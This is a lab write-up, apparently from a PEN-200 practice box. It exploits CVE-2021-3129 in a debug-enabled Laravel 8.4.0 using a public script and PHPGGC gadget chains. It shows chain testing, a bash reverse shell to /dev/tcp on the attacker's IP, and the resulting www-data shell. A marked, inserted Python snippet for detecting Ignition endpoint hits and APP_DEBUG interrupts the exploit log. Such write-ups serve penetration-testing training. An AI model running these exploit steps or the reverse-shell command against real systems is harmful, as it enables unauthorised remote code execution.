CVE-2021-3129


The target Laravel instance appears to be vulnerable to CVE-2021-3129 due to its outdated version and the debug-mode option being enabled.

Laravel Log Path


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ 
 
  _____   _____   ___ __ ___ _    _____ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_,  /
 \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/ 
 https://github.com/joshuavanderpoll/CVE-2021-3129
 Using PHPGGC: https://github.com/ambionics/phpggc
 
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[•] Use "?" for a list of all available actions.
[?] Please enter a command to execute : 

Executing the exploit automatically finds the Laravel log path: /var/www/html/lavita/storage/logs/laravel.log

Commands


[?] Please enter a command to execute : ?
[•] Available commands
    exit                       -  Exit program..
    help                       -  Show available commands..
    clear_logs                 -  Clear Laravel logs..
    execute <command>          -  Execute system command..
    write <text>               -  Write to log file..
    patch <env/index/private>  -  Patch the vulnerability..
    patches                    -  Detailed information about patch modes.

There are several commands available within the exploit; I'll go with the execute command.

PHPGGC


[?] Please enter a command to execute : execute id
[@] Executing command "id"...
[@] Generating payload...
[!] Required binary PHPGGC not found.
[@] Downloading PHPGGC from "ambionics/phpggc" GitHub repository...
[√] Downloaded/extracted PHPGGC.
[@] Updating PHPGGC execution permissions...
[√] Updated PHPGGC execution permissions.
PHP Deprecated:  Creation of dynamic property Illuminate\Validation\Rules\RequiredIf::$condition is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/8/gadgets.php on line 22
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\BroadcastEvent::$connection is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/9/gadgets.php on line 46
ERROR: Phar requires either a __destruct or a __wakeup vector
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$event is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 22
PHP Deprecated:  Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$events is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 23
PHP Deprecated:  Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/8/gadgets.php on line 18
PHP Deprecated:  Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/9/gadgets.php on line 35
[√] Generated 21 payloads.
[@] Trying chain laravel/rce1 [1/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
 
 
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] : 

Executing a system command automatically downloads the PHPGGC tool and generates all 21 available payloads. The first chain, laravel/rce1, appears to have failed as it shows no output.
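From the defender's side, the sequence above (clear logs, cause an error, send the payload, convert it) means every chain attempt sends a burst of requests to /_ignition/execute-solution, the endpoint the script tested first. The following Python is added here and is not part of the original writeup or the exploit script: it parses constructed combined-log-format access-log lines, flags requests to that path, counts them per source, and checks a .env fragment for the APP_DEBUG setting the vulnerability depends on. The log lines, addresses and the burst threshold are constructed/assumed values.

```python
import re
from collections import Counter

# Constructed sample access-log lines (combined log format, not from the writeup).
SAMPLE_ACCESS_LOG = """\
192.168.45.249 - - [10/Mar/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 1234
192.168.45.249 - - [10/Mar/2024:12:00:02 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 45
192.168.45.249 - - [10/Mar/2024:12:00:03 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0
10.0.0.7 - - [10/Mar/2024:12:00:04 +0000] "GET /login HTTP/1.1" 200 2345
192.168.45.249 - - [10/Mar/2024:12:00:05 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 45
"""

# Constructed .env fragment; APP_DEBUG is the Laravel setting that exposes Ignition.
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=production\nAPP_DEBUG=true\n"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
IGNITION_PATH = "/_ignition/execute-solution"


def find_ignition_requests(log_text):
    """Return (ip, timestamp, method, status) for each hit on the Ignition endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m.group("path").split("?", 1)[0]  # ignore any query string
        if path == IGNITION_PATH:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"), int(m.group("status"))))
    return hits


def bursty_sources(hits, threshold=2):
    """Sources with at least `threshold` hits; one chain attempt produces several requests."""
    counts = Counter(ip for ip, *_ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def debug_mode_enabled(env_text):
    """True when the .env sets APP_DEBUG to a truthy value (case-insensitive)."""
    for line in env_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "APP_DEBUG":
            return value.strip().strip('"\'').lower() in ("true", "1", "on")
    return False
```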

[?] Would you like to try the next chain? [Y/N] : Y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
[?] Would you like to try the next chain? [Y/N] : N

Moving on to the next payload, laravel/rce2 succeeded, so I will stick with the second gadget chain.

Exploitation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ --chain laravel/rce2 --exec 'bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1"'
  _____   _____   ___ __ ___ _    _____ ___ ___ 
 / __\ \ / / __|_|_  )  \_  ) |__|__ / |_  ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_,  /
 \___| \_/ |___| /___\__/___|_|  |___/_/___|/_/ 
 https://github.com/joshuavanderpoll/CVE-2021-3129
 Using PHPGGC: https://github.com/ambionics/phpggc
 
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[@] Clearing Laravel logs...
[√] Cleared Laravel logs!
[@] Executing command "bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1""...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain laravel/rce2 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.

Executing the exploit script with a reverse shell payload.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.38] 37766
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/$ whoami
whoami
www-data
www-data@debian:/$ hostname
hostname
debian
www-data@debian:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:2c5d/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting CVE-2021-3129.